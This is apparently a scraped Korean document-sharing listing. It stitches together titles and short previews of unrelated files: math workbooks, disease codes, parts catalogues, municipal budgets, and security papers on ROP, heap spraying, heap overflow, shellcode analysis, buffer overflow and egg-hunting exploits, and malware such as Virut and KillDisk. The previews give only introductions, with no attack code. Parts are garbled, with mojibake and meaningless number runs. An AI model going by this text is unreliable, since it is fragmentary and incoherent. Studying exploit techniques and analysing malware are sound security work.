°ø±â¾Ð±â±â 20, 30, 40 20, 30, 40 1 2 3 4 5 6 7 8 9 10 3.1 6.3 9.4 12.6 15.7 18.8 22.0 25.1 28.3 31.4 2.4 4.7 7.1 9.4 11.8 14.1 16.5 18.8 21.2 23.6 7.1 14.1 21.2 28.3 35.3 42.4 49.5 56.5 63.6 70.7 5.9 11.9 17.8 23.7

More information

01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - PO

01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - PO 01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - POP; POP; POP; RET PLT & GOT Debug Proof of concept Example

More information

Microsoft Word - Heap_Spray.doc

Microsoft Word - Heap_Spray.doc Heap Spray 본문서는 최근 웹 브라우저를 이용한 공격에 사용되는 Heap Spray 기법에 대한 내용을 수록하였다. 관련 내용에 대하여 많은 도움이 되기 바란다. 문서 내용은 초보자도 쉽게 이해할 수 있도록 관련 내용에 대한 설명을 포함하였다. Hacking Group OVERTIME force< forceteam01@gmail.com > 2007.05.13

More information

(01-16)유형아작중1-2_스피드.ps

(01-16)유형아작중1-2_스피드.ps 01 p.10 0001 000 61 0003 4 8 3 4 5 7 4 3 3 3 6 8 9 5 1 1 3 7 9 6 0 1 0004 4 0005 0006 3 0007 6 0008 30 0009 3 19 0010 10 ~14 14 ~18 9 18 ~1 11 1 ~16 4 16 ~0 4 30 0011 160 cm 170 cm 001 10 cm 5 0013 135

More information

Heap Overflow By WraithOfGhost

Heap Overflow By WraithOfGhost Heap Overflow - 101 By WraithOfGhost 이전스택오버플로우문서에서예외처리핸들러 (Exception Handler) 를호출하거나직접적인방법을 EIP 레지스터를제어하는방법을보여주었다. 본문서는 EIP / SEH를직접이용하지않고프로그램의실행흐름을제어하는일련의방법들에대하여다룰예정이다. 공격자가정한값을원하는메모리주소에덮어씀으로써임의의 DWORD

More information

/* */

/* */ /*---------------------------------------------------------------------------------*/ 번역 : innovation@wowhacker.org /*---------------------------------------------------------------------------------*/

More information

HWP Document

HWP Document CODE A00-B99 A00-A09 A00 KOR_TITLE 특정 감염성 및 기생충성 질환 창자 감염 질환 콜레라 A00.0 비브리오 콜레리 01 전형균에 의한 콜레라 A00.0 전형균에 의한 콜레라 A00.1 비브리오 콜레리 01 엘토르형균에 의한 콜레라 A00.1 엘토르형균에 의한 콜레라 A00.9 상세불명의 콜레라 A01 A01.0 장티푸스 장티푸스

More information

(001~007)수능기적(적통)부속

(001~007)수능기적(적통)부속 0 6 06. C : k d=k+c k «+-, : «d= «± +C + =- : d=: ;[!; d=l +C : kf()d=k: f()d k : { f()+g()} d=: f()d+: g()d : { f()-g()} d=: f()d-: g()d : si d=-cos +C : cos d=si+c 008 : sec d=ta +C : cosec d=-cot +C

More information

Microsoft Word - AntiCrackingTechnique.doc

Microsoft Word - AntiCrackingTechnique.doc Reverse Engineering Anti-Cracking Techniques 저자 : Nicolaous George (ishtus@astalavista.com) & Charalambous Glafkos (glafkos@astalavista.com) 편역 : Kancho ( kancholove@gmail.com ) 이문서는 www.milw0rm.com의 [papers]

More information

Microsoft Word - Static analysis of Shellcode.doc

Microsoft Word - Static analysis of Shellcode.doc Static analysis of Shellcode By By Maarten Van Horenbeeck 2008.09.03 2008.09.03 본문서에서는악성코드에서사용하는난독화되어있는쉘코드 를분석하는방법에대한 Maarten Van Horenbeeck 의글을번역 한것이다. Hacking Group OVERTIME OVERTIME force

More information

AD AD 8-0 / A A-2 / A A A-5 / A A T-T / Q

AD AD 8-0 / A A-2 / A A A-5 / A A T-T / Q 8-0 / 1-00... 002 A-1..... 003 A-2 / A-3....... 004 A-4..... 007 A-5 / A-6..... 012 A-8..... 016 T-T / Q-7... 017 1 8-0 1986-1991 20-5083-A5 RH 20-5084-A5 LH 893941030 893941029 HE LAMP B TYPE 18-5143-05

More information

Microsoft Word - Dropper.Agent D.doc

Microsoft Word - Dropper.Agent D.doc Dropper/Agent.97280.D Analysis 1. 개요잊을만하면한번씩사회공학기법 (Social Engineering) 을이용한악성코드가출현했다. 이번에는첨부파일인 Police.exe 를확인하고경찰서로출두하라는내용과함께불특정다수에게유포되었는데아마메일을받고도둑이제발저린다고순간뜨끔했던사용자들도있었을것이다. 이문서에서 Dropper/Agent.97280.D(

More information

Scanned by CamScanner

Scanned by CamScanner Scanned by CamScanner Scanned by CamScanner ABCBDEFFEAFFE FBFAEAAF 1. A BCDE CE FC AECFCE C C F F DEEFDEEFCECDCFEFCFAEFCEECEBB FECECECAFDFCEFFE CCFFCFFFACCEFA EF 2. EEFCCFCEFFAFADCAAABCDECE FFA 3. CECFBEFCCECFFCEC

More information

GSC Incident Report-바이킹 바이러스 분석

GSC Incident Report-바이킹 바이러스 분석 GSC Incident Report- 바이킹바이러스분석 1. 작성일시 : 2006.10.26 20:17(GMT +09:00) 2. 작성자 : 안창용 / 바이러스분석팀 3. 바이킹바이러스에대해서바이킹바이러스는 2005 년 2 월경최초발견된후잠시주춤하다가 2005 년 5 월부터국내에서웹해킹을통한악성코드유포사례가이슈화되면서 Internet Explorer 의취약성을공격하는

More information

Table of Contents 1. 분석 유포경로 악성파일분석 드롭퍼 A 분석 드롭퍼 B 분석 페이지 2 / 17

Table of Contents 1. 분석 유포경로 악성파일분석 드롭퍼 A 분석 드롭퍼 B 분석 페이지 2 / 17 Trojan.KillDisk.MBR 악성코드분석보고서 (V 4.0) ESTsoft Corp. ALTOOLS Division Malware Research 페이지 1 / 17 Table of Contents 1. 분석...1 1-1. 유포경로... 2 1-2. 악성파일분석... 3 1-2-1. 드롭퍼 A 분석... 3 1-2-2. 드롭퍼 B 분석... 10 페이지

More information

1. Execution sequence 첫번째로 GameGuard 의실행순서는다음과같습니다 오전 10:10:03 Type : Create 오전 10:10:03 Parent ID : 0xA 오전 10:10:03 Pro

1. Execution sequence 첫번째로 GameGuard 의실행순서는다음과같습니다 오전 10:10:03 Type : Create 오전 10:10:03 Parent ID : 0xA 오전 10:10:03 Pro #44u61l5f GameGuard 에대한간단한분석. By Dual5651 (http://dualpage.muz.ro) 요약 : 이문서는분석자의입장에서 GameGuard의동작을모니터링한것에대한것입니다. 실제 GameGuard의동작방식과는다소차이가있을수있습니다. 이문서에등장하는모든등록상표에대한저작권은해당저작권자에게있습니다. 1. Execution sequence

More information

hwp

hwp 최종연구보고서 - 1 - - 1 - - 2 - - 3 - - 4 - - 5 - - 6 - - 7 - - 8 - - 9 - - 10 - - 11 - - 12 - - 13 - - 14 - - 15 - - 16 - - 17 - - 18 - - 19 - - 20 - - 21 - - 22 - - 23 - - 24 - - 25 - - 26 - - 27 - - 28 -

More information

A C O N T E N T S A-132

A C O N T E N T S A-132 C O N T E N T S -2 SC2 Series -3 SC2 Series -4 SC2 Series SC2 B 40 B 100 S I SC2 B 40 B 100 RO R S I SC2-2 B 40 B 100 HOY R S I -5 SC2 R0 40 SW R0 SC2 R 40 SC2 Series SW RB SW R SC2-2 H0 40 SW H0 SC2-2

More information

Reusing Dynamic Linker For Exploitation Author : Date : 2012 / 05 / 13 Contact : Facebook : fb.me/kwonpwn

Reusing Dynamic Linker For Exploitation Author :  Date : 2012 / 05 / 13 Contact : Facebook : fb.me/kwonpwn Reusing Dynamic Linker For Exploitation Author : pwn3r @ B10S @WiseGuyz Date : 2012 / 05 / 13 Contact : austinkwon2@gmail.com Facebook : fb.me/kwonpwn3r Abstract 대부분의 Unix 에선공유라이브러리를메모리에로드하고프로그램과 link

More information

1.기본현황 연 혁 m 본면은 신라시대 ~고려시대 상주목에 속한 장천부곡 지역 m 1895.5.26한말에 이르러 장천면(76개 리동),외동면(18개 리동)으로 관할 m 1914.3.1행정구역 개편으로 상주군 장천면과 외동면이 병합하여 상주군 낙동면 (17개 리,25개

1.기본현황 연 혁 m 본면은 신라시대 ~고려시대 상주목에 속한 장천부곡 지역 m 1895.5.26한말에 이르러 장천면(76개 리동),외동면(18개 리동)으로 관할 m 1914.3.1행정구역 개편으로 상주군 장천면과 외동면이 병합하여 상주군 낙동면 (17개 리,25개 목 차 1.읍면동 기본현황 2.지방세 징수현황 3.소규모 주민숙원사업비 집행현황 4.예산 집행현황 5.예산 미집행 현황 6.고액체납자 현황 및 징수(독려)현황 7.관외체납세 징수(독려)현황 8.특수시책 확인자 낙 동 면 장 김 진 숙 (인) 부 면 장 차 정 식 (인) 주 민 생 활 지 원 담 당 김 영 욱 (인) 민 원 담 당 전 용 희 (인) 산 업 담

More information

<4D F736F F D20B9D9C0CCB7B5B9D9C0CCB7AFBDBA5FBCF6C1A42E646F63>

<4D F736F F D20B9D9C0CCB7B5B9D9C0CCB7AFBDBA5FBCF6C1A42E646F63> Virut 바이러스공격 ASEC 분석 1 팀고흥환선임연구원 해마다접수되는악성코드의통계를보면대부분이인터넷웜또는트로이목마가대부분을차지하며, 파일에기생하는바이러스는그수가적어지는것이추세이다. 그도그럴것이최근의악성코드특징은개인의능력과시가아닌돈과연관되는악성코드작성이대부분이기때문이다. 그렇다면 Virut 바이러스가인터넷웜과트로이목마를제치고국내뿐만아니라해외에서도큰피해를입히고있는이유가무엇인지,

More information

MPLAB C18 C

MPLAB C18 C MPLAB C18 C MPLAB C18 MPLAB C18 C MPLAB C18 C #define START, c:\mcc18 errorlevel{0 1} char isascii(char ch); list[list_optioin,list_option] OK, Cancel , MPLAB IDE User s Guide MPLAB C18 C

More information

G5 G25 H5 I5 J5 K5 AVERAGE B5 F5 AVERAGE G5 G24 MAX B5 F5 MIN B5 F5 $G$25 0.58 $H$25 $G$25 $G$25 0.58 $H$25 G24 H25 H24 I24 J24 K24 A5 A24 G5 G24, I5

G5 G25 H5 I5 J5 K5 AVERAGE B5 F5 AVERAGE G5 G24 MAX B5 F5 MIN B5 F5 $G$25 0.58 $H$25 $G$25 $G$25 0.58 $H$25 G24 H25 H24 I24 J24 K24 A5 A24 G5 G24, I5 C15 B6 B12 / B6 B7 C16 F6 F12 / F6 F7 G16 C16/C15 1 C18 B6 B12 / B6 B8 B9 C19 F6 F12 / F6 F8 F9 G19 C19/C18 1 1 G5 G25 H5 I5 J5 K5 AVERAGE B5 F5 AVERAGE G5 G24 MAX B5 F5 MIN B5 F5 $G$25 0.58 $H$25 $G$25

More information

Microsoft Word - MSOffice_WPS_analysis.doc

Microsoft Word - MSOffice_WPS_analysis.doc MS Office.WPS File Stack Overflow Exploit 분석 (http://milw0rm.com/ 에공개된 exploit 분석 ) 2008.03.03 v0.5 By Kancho ( kancholove@gmail.com, www.securityproof.net ) milw0rm.com에 2008년 2월 13일에공개된 Microsoft Office.WPS

More information

목차 1. 소개... 3 가. BOF란?... 3 나. 윈도우 BOF 개발환경및사용툴 Shellcode 작성하기... 4 가. cmd 쉘 ) 소스코드작성 ) 디스어셈블리 ) 어셈블리코드편집 간단

목차 1. 소개... 3 가. BOF란?... 3 나. 윈도우 BOF 개발환경및사용툴 Shellcode 작성하기... 4 가. cmd 쉘 ) 소스코드작성 ) 디스어셈블리 ) 어셈블리코드편집 간단 기술문서 `09. 11. 02. 작성 Windows Buffer Overflow Attack 작성자 : 영남대학교정보보호연구학회 @Xpert 김슬예나 prehea@ynu.ac.kr 1 목차 1. 소개... 3 가. BOF란?... 3 나. 윈도우 BOF... 3 2. 개발환경및사용툴... 3 3. Shellcode 작성하기... 4 가. cmd 쉘... 4

More information

13일등예감수학1-1정답(077~120)

13일등예감수학1-1정답(077~120) - ~8 0 00,,, 00,, 8, 9, 0 00 00,,, 9 00,,,, 9 00 00 008 009 0 00 8 0 0 fi 0 0 0 9fi 0 0 fl 08 _ 09 _ 00 _ _ 0 _ _ 0 { } ~ 0 _ _ 0 0 _ _ fi _ 0,, 0,,, 8 08,, 9 09, 00,,,,, 8,, 0,,, 0,, 0 0 0 0 0 0, 0, 08,,

More information

1. 개요 악성코드는여러분류로나누어볼수가있다. 이중일반사용자의입장에서 악성코드 라는단어보다친숙한 바이러스 가있다. 사실필자도보안을공부하기이전에는 악성코드 라는단어는아예들어보지못했고, 대신 바이러스 라는단어로모든악성코드를지칭했었다. 바이러스는악성코드분류의한종류로 스스로를

1. 개요 악성코드는여러분류로나누어볼수가있다. 이중일반사용자의입장에서 악성코드 라는단어보다친숙한 바이러스 가있다. 사실필자도보안을공부하기이전에는 악성코드 라는단어는아예들어보지못했고, 대신 바이러스 라는단어로모든악성코드를지칭했었다. 바이러스는악성코드분류의한종류로 스스로를 Malware Analysis Report Mad Angel 2016.09.17 By Kali-KM 1. 개요 악성코드는여러분류로나누어볼수가있다. 이중일반사용자의입장에서 악성코드 라는단어보다친숙한 바이러스 가있다. 사실필자도보안을공부하기이전에는 악성코드 라는단어는아예들어보지못했고, 대신 바이러스 라는단어로모든악성코드를지칭했었다. 바이러스는악성코드분류의한종류로

More information

Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugg

Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugg 익스플로잇실습 / 튜토리얼 Eureka Mail Client 2.2q Omelet Egg Hunting By WraithOfGhost Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python 2.7.10 - Ollydbg

More information

20150415_032300011102_0.xls

20150415_032300011102_0.xls [주식형 펀드] [ 자산운용보고서 ] (운용기간: 2015년 01월 16일 2015년 04월 15일) o 이 상품은 [주식형 펀드] 로서, [추가 입금이 가능한 추가형이고, 다양한 판매보수의 종류를 선택할 수 있는 종류형 펀드입니다.] o 자산운용보고서는 자본시장과 금융투자업에 관한 법률에 의거 자산운용회사가 작성하며, 투자자가 가입한 상품의 특정기간(3개월)동안의

More information

ActFax 4.31 Local Privilege Escalation Exploit

ActFax 4.31 Local Privilege Escalation Exploit NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고

More information

1 1,.,

1 1,., ,.,. 7 86 0 70 7 7 7 74 75 76 77 78 79 70 7 7 7 75 74 7 7 7 70 79 78 77 76 75 74 7.,. x, x A(x ), B(x ) x x AB =x -x A{x } B{x } x >x AB =x -x B{x } A{x } x =[ -x(xæ0) -x (x

More information

Microsoft PowerPoint - a9.ppt [호환 모드]

Microsoft PowerPoint - a9.ppt [호환 모드] 9.1 이장의내용 9 장. 스트링과배열 스트링프리미티브명령어 2 차원배열 정수배열검색및정렬 컴퓨터정보통신 어셈블리언어 2 9.2 스트링프리미티브명령어 String Primitive Instructions 의동작 String Primitive Instructions Instructions 설명 동작 MOVS(B,W,D) Move string data M[EDI]

More information

<4D F736F F F696E74202D20B8B6C0CCC5A9B7CEC7C1B7CEBCBCBCAD202839C1D6C2F7207E203135C1D6C2F >

<4D F736F F F696E74202D20B8B6C0CCC5A9B7CEC7C1B7CEBCBCBCAD202839C1D6C2F7207E203135C1D6C2F > 10주차 문자 LCD 의인터페이스회로및구동함수 Next-Generation Networks Lab. 5. 16x2 CLCD 모듈 (HY-1602H-803) 그림 11-18 19 핀설명표 11-11 번호 분류 핀이름 레벨 (V) 기능 1 V SS or GND 0 GND 전원 2 V Power DD or V CC +5 CLCD 구동전원 3 V 0 - CLCD 명암조절

More information

Microsoft Word - FunctionCall

Microsoft Word - FunctionCall Function all Mechanism /* Simple Program */ #define get_int() IN KEYOARD #define put_int(val) LD A val \ OUT MONITOR int add_two(int a, int b) { int tmp; tmp = a+b; return tmp; } local auto variable stack

More information

歯2019

歯2019 122 (22 ) 68 (5 ) 8 (3) 8 (3) 8 ( ) 7 (5) 5 (5) 4 ( ) 4 ( ) 3 (1) 3 ( ) 1 ( ) 1 ( ) 1 ( ) 1 ( ) ( ) ( ) * :, ( ) : : 10 : 1 : : 18 : 9 : 8 : 5 (10 ) ( : ) 2002.8. 1 2003.2. 1 1 180,000 225,000 45,000 2

More information

제 호 년 제67차 정기이사회, 고문 자문위원 추대 총동창회 집행부 임원 이사에게 임명장 수여 월 일(일) 년 월 일(일) 제 역대 최고액 모교 위해 더 확충해야 강조 고 문:고달익( 1) 김병찬( 1) 김지훈( 1) 강보성( 2) 홍경식( 2) 현임종( 3) 김한주( 4) 부삼환( 5) 양후림( 5) 문종채( 6) 김봉오( 7) 신상순( 8) 강근수(10)

More information

<BCF6C1A4BBE7C7D72DB5F0C0DAC0CEBAD0B7F9C7A55FB0B3C1A4BEC828C3D6C1BE29345F313232342E687770>

<BCF6C1A4BBE7C7D72DB5F0C0DAC0CEBAD0B7F9C7A55FB0B3C1A4BEC828C3D6C1BE29345F313232342E687770> 2010. 1 2010. 1 일 러 두 기 디자인보호법시행규칙 제9조제1항에 전단에 따른 별표 4의 물품의 범위에서 물품의 용도와 기능 등을 고려하여 특허 청장이 고시한 물품의 명칭이다. 물품의 구분은 디자인등록출원서 작성의 일관성 유지와 통 일된 명칭을 사용하기 위한 것으로 디자인 물품 상호 간의 유사범위를 정하는 것은 아니다. 이 고시에 등록을 받으려는

More information

Microsoft Word - FS_ZigBee_Manual_V1.3.docx

Microsoft Word - FS_ZigBee_Manual_V1.3.docx FirmSYS Zigbee etworks Kit User Manual FS-ZK500 Rev. 2008/05 Page 1 of 26 Version 1.3 목 차 1. 제품구성... 3 2. 개요... 4 3. 네트워크 설명... 5 4. 호스트/노드 설명... 6 네트워크 구성... 6 5. 모바일 태그 설명... 8 6. 프로토콜 설명... 9 프로토콜 목록...

More information

" " "! $ ' " " $ % & 2

  ! $ '   $ % & 2 SB-800 Kr " " "! $ ' " " $ % & 2 ' ( # # # # " & " # # "! 3 " " # ' # $ # " " " " " 4 " " " " ( # " " " " 5 # $ " " # " " " ( # " 6 " # $ " " # " " " ( # ' " " 7 8 9 k k k k k k k k k u 10 k k k k k 11

More information

<C3D1C1A4B8AE20303120B0E6BFECC0C720BCF620323030B9AE2E687770>

<C3D1C1A4B8AE20303120B0E6BFECC0C720BCF620323030B9AE2E687770> 1. 1. 1) 1. 경우의 수 주사위를 한 개를 던질 때, 다음 경우의 수 (1) 소수 4. 4. 4) 집에서 학교로 가는 버스는 3 개 노선, 지하철은 4 개 노선이 있다. 버스나 지하철을 이용하여 집 에서 학교로 가는 방법은 모두 몇 가지인가? (2) 5의 약수 2. 2. 2) 1~10 숫자에서 하나를 뽑을때, (1) 3의 배수 경우의수 5. 5. 5)

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 @ Lesson 3 if, if else, if else if, switch case for, while, do while break, continue : System.in, args, JOptionPane for (,, ) @ vs. logic data method variable Data Data Flow (Type), ( ) @ Member field

More information

Microsoft PowerPoint - 7_배열_문자열

Microsoft PowerPoint - 7_배열_문자열 * 이번주주제: 배열, 문자열 1 * 지난주내용: 함수 2 * 배열의 개념 (p86) - 복수의 동일한 데이터 형의 변수를 하나로 묶은 것. - 대량의 데이터를 취급할 때나 여러 데이터를 차례로 자동적으로 입출력해야 할 때 배열을 사용 하면 편리. - 배열도 변수와 마찬가지로 선언이 필요. - 배열을 초기화 할 때는 { }를 사용하여 값을 열거. - [ ]안의

More information

2005년 6월 고1 전국연합학력평가

2005년 6월 고1 전국연합학력평가 제 1 교시 2015학년도 9월 모평 대비 EBS 리허설 2차 국어 영역(B형) 김철회의 1등급에 이르게 해 주는 [보기] 활용 문제 미니 모의고사(문학편) 1 유형편 [1]다음 글을 읽고 물음에 답하시오. 1. 를 참고하여 (가)를 이해할 때, 적절하지 않은 것은? (가) 머리는 이미 오래 전에 잘렸다 / 전깃줄에 닿지 않도록 올해는 팔다리까지 잘려

More information

untitled

untitled 200 180 ( ) () 1,060 1,040 160 140 120 / () 1,020 1,000 980 100 960 80 940 60 920 2005.1 2005.2 2005.3 2005.4 2006.1 2006.2 2006.3 2006.4 2007.1 2007.2 2007.3 150000 () (% ) 5.5 100000 CD () 5.4 50000

More information

<30352D30312D3120BFB5B9AEB0E8BEE0C0C720C0CCC7D82E687770>

<30352D30312D3120BFB5B9AEB0E8BEE0C0C720C0CCC7D82E687770> IT법률컨설팅 강의교안 (상) 영문계약의 이해 소프트웨어 자산관리기법 영문계약의 이해 - 1 - - 2 - - 3 - - 4 - - 5 - - 6 - - 7 - - 8 - - 9 - - 10 - - 11 - - 12 - - 13 - - 14 - - 15 - - 16 - - 17 - - 18 - - 19 - - 20 - - 21 - - 22 - - 23 -

More information

Microsoft PowerPoint - chap07.ppt

Microsoft PowerPoint - chap07.ppt 2010-1학기 현대암호학 제Ⅱ부인증 박종혁 Tel: 970-6702 Email: jhpark1@snut.ac.kr 제7장일방향 해시 함수 목차 일방향 해시 함수 일방향 해시 함수의 응용 예 일방향 해시 함수의 예 일방향해시함수SHA-1 (512) 일방향 해시 함수로 해결할 수 없는 문제 7.0 주요 내용 범죄 수사에서는 지문을 이용하는 일이 있다. 특정인의

More information

2015 CodeGate 풀이보고서 김성우 1. systemshock strcat(cmd, argv[1]); 에서스택버퍼오버플로우가발생합니다

2015 CodeGate 풀이보고서 김성우   1. systemshock strcat(cmd, argv[1]); 에서스택버퍼오버플로우가발생합니다 2015 CodeGate 풀이보고서 김성우 rkwk0112@gmail.com http://cd80.tistory.com 1. systemshock strcat(cmd, argv[1]); 에서스택버퍼오버플로우가발생합니다 argv[1] 의주소는스택에있으므로 cmd부터버퍼를오버플로우시켜 argv[1] 이저장된주소까지접근이가능하면 strlen(argv[1]); 시

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 @ Lesson 2... ( ). ( ). @ vs. logic data method variable behavior attribute method field Flow (Type), ( ) member @ () : C program Method A ( ) Method B ( ) Method C () program : Java, C++, C# data @ Program

More information

15강 판소리계 소설 심청전 다음 글을 읽고 물음에 답하시오. [1106월 평가원] 1)심청이 수궁에 머물 적에 옥황상제의 명이니 거행이 오죽 하랴. 2) 사해 용왕이 다 각기 시녀를 보내어 아침저녁으로 문 안하고, 번갈아 당번을 서서 문안하고 호위하며, 금수능라 비

15강 판소리계 소설 심청전 다음 글을 읽고 물음에 답하시오. [1106월 평가원] 1)심청이 수궁에 머물 적에 옥황상제의 명이니 거행이 오죽 하랴. 2) 사해 용왕이 다 각기 시녀를 보내어 아침저녁으로 문 안하고, 번갈아 당번을 서서 문안하고 호위하며, 금수능라 비 14강 역사영웅소설 15강 판소리계 소설 판소리계 소설 : , 등 일반적으로 판소리 사설의 영향을 받아 소설로 정착된 작품을 가리킨 판소리 : , , , , 등이 사설과 창이 전해지고 있 하층민의 예술로 시작하여 전계층을 아우르는 예술이 되었 상류층, 지배층이 향유층이 되면서 점차 작품의 주제가

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture1 Malware Analysis #1 Agenda 악성코드정적분석 악성코드분석 악성코드정적분석 정적분석 임의의코드또는응용프로그램을실행하지않고분석 ASCII 문자열 (ex. URL) API 리스트 Packing VT 기타등등 정적분석 : 파일식별 악성으로의심되는파일의형태식별 file

More information

기본서(상)해답Ⅰ(001~016)-OK

기본서(상)해답Ⅰ(001~016)-OK 1 1 01 01 (1) () 5 () _5 (4) _5_7 1 05 (5) { } 1 1 { } (6) _5 0 (1), 4 () 10, () 6, 5 0 (1) 18, 9, 6, 18 1,,, 6, 9, 18 01 () 1,,, 4, 4 1,,, 4, 6, 8, 1, 4 04 (1) () () (4) 1 (5) 05 (1) () () (4) 1 1 1 1

More information

Microsoft PowerPoint - windbg쉤무2(맋운톬로ífl—로엸엜Callingê·œìŁ½).pptx

Microsoft PowerPoint - windbg쉤무2(맋운톬로ífl—로엸엜Callingê·œìŁ½).pptx 본강의 PDF 는하제소프트다운로드자료실에서받아보실수있습니다 하제소프트 주식회사하제소프트 (www.hajesoft.co.kr) 강사이봉석 과정소개 윈도우응용프로그램, 윈도우서비스프로그램, 윈도우디바이스드라이버를개발하는개발자들로하여금고급디버깅기술을제공하는 윈도우디버거 (WinDBG) 사용방법을익히게하여, 고급시스템프로그래머를양성하는데있습니다 윈도우디버거 (WinDBG)

More information

PowerPoint Template

PowerPoint Template BoF 원정대서비스 목차 환경구성 http://www.hackerschool.org/hs_boards/zboard.php?id=hs_notice&no=1170881885 전용게시판 http://www.hackerschool.org/hs_boards/zboard.php?id=bof_fellowship Putty War game 2 LOB 란? 해커스쿨에서제공하는

More information

API 매뉴얼

API 매뉴얼 PCI-DIO12 API Programming (Rev 1.0) Windows, Windows2000, Windows NT and Windows XP are trademarks of Microsoft. We acknowledge that the trademarks or service names of all other organizations mentioned

More information

第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대

第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대검찰청 차장검사,대검찰청 검사,검찰연구관,부

More information

[Immunity Debugger & Python (Part 1)] Written by Osiris ( , msn by beistlab(

[Immunity Debugger & Python (Part 1)] Written by Osiris ( , msn by beistlab( [Immunity Debugger & Python (Part 1)] Written by Osiris (email, msn mins4416@naver.com) by beistlab(http://beist.org) Synopsis Immunity Debugger는 Python을플러그인형태로지원하고있습니다. 이 2개를연동할경우강력한 Reverse Engineering

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 7-Segment Device Control - Device driver Jo, Heeseung HBE-SM5-S4210 의 M3 Module 에는 6 자리를가지는 7-Segment 모듈이아래그림처럼실장 6 Digit 7-Segment 2 6-Digit 7-Segment LED controller 16비트로구성된 2개의레지스터에의해제어 SEG_Sel_Reg(Segment

More information

AsProtect MUP

AsProtect MUP 2013-06-18 Lazly 목차 1. 목적 3 0x01. 문서의목적. 3 0x02. 문서에서다루는내용 3 2. 프로그램설명.. 4 0x01. AsProtect 설명. 4 3.... 5 0x01. Find OEP... 5 0x02. DUMP.. 7 0x03. 에러발생.. 9 0x04. 에러확인.. 11 4. 자동화기법. 14 0x01. 빈공간찾기. 14 0x02.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 7-Segment Device Control - Device driver Jo, Heeseung HBE-SM5-S4210 의 M3 Module 에는 6 자리를가지는 7-Segment 모듈이아래그림처럼실장 6 Digit 7-Segment 2 6-Digit 7-Segment LED Controller 16비트로구성된 2개의레지스터에의해제어 SEG_Sel_Reg(Segment

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 (Host) set up : Linux Backend RS-232, Ethernet, parallel(jtag) Host terminal Target terminal : monitor (Minicom) JTAG Cross compiler Boot loader Pentium Redhat 9.0 Serial port Serial cross cable Ethernet

More information

Microsoft Word - PE Infection ? How to Inject a dll.doc

Microsoft Word - PE Infection ? How to Inject a dll.doc Black- out Frenzy [ B] (F) Security Researcher Center B0Frenzy.freehostia.com PE Infection How to Inject a dll www.mihanit.net Thank you to my friends who help me in this research (K053,Heli, L U C I F

More information

?뗡뀶?믟뀱?솽꼶?듄꼮??

?뗡뀶?믟뀱?솽꼶?듄꼮?? ACB/ATS/SPD Air Circuit Breaker / Automatic Transfer Switch / Surge Protective Device Moving Forward into the World 02_03 World Class Brand ACB/ATS/SPD Air Circuit Breaker / Automatic Transfer Switch /

More information

Microsoft PowerPoint - a5a.ppt [호환 모드]

Microsoft PowerPoint - a5a.ppt [호환 모드] 5 장프로시저 (1) 책의라이브러리사용 5 장전반부 : 책의링크라이브러리 외부링크라이브러리개요 라이브러리프로시저호출 라이브러리링크 라이브러리프로시저 예제 연세대학교컴퓨터정보통신어셈블리언어 2 저자제공링크라이브러리 라이브러리파일 어셈블된프로시저를포함하고있는 OBJ 파일들을모아놓은파일 ( 확장자.LIB) 각 OBJ file 에는하나이상의 procedure 가들어있음

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 7-SEGMENT DEVICE CONTROL - DEVICE DRIVER Jo, Heeseung 디바이스드라이버구현 : 7-SEGMENT HBE-SM5-S4210 의 M3 Module 에는 6 자리를가지는 7-Segment 모듈이아래그림처럼실장 6 Digit 7-Segment 2 디바이스드라이버구현 : 7-SEGMENT 6-Digit 7-Segment LED

More information

[8051] 강의자료.PDF

[8051] 강의자료.PDF CY AC F0 RS1 RS0 OV - P 0xFF 0x80 0x7F 0x30 0x2F 0x20 0x1F 0x18 0x17 0x10 0x0F 0x08 0x07 0x00 0x0000 0x0FFF 0x1000 0xFFFF 0x0000 0xFFFF RAM SFR SMOD - - - GF1 GF0 PD IDL 31 19 18 9 12 13 14 15 1 2 3 4

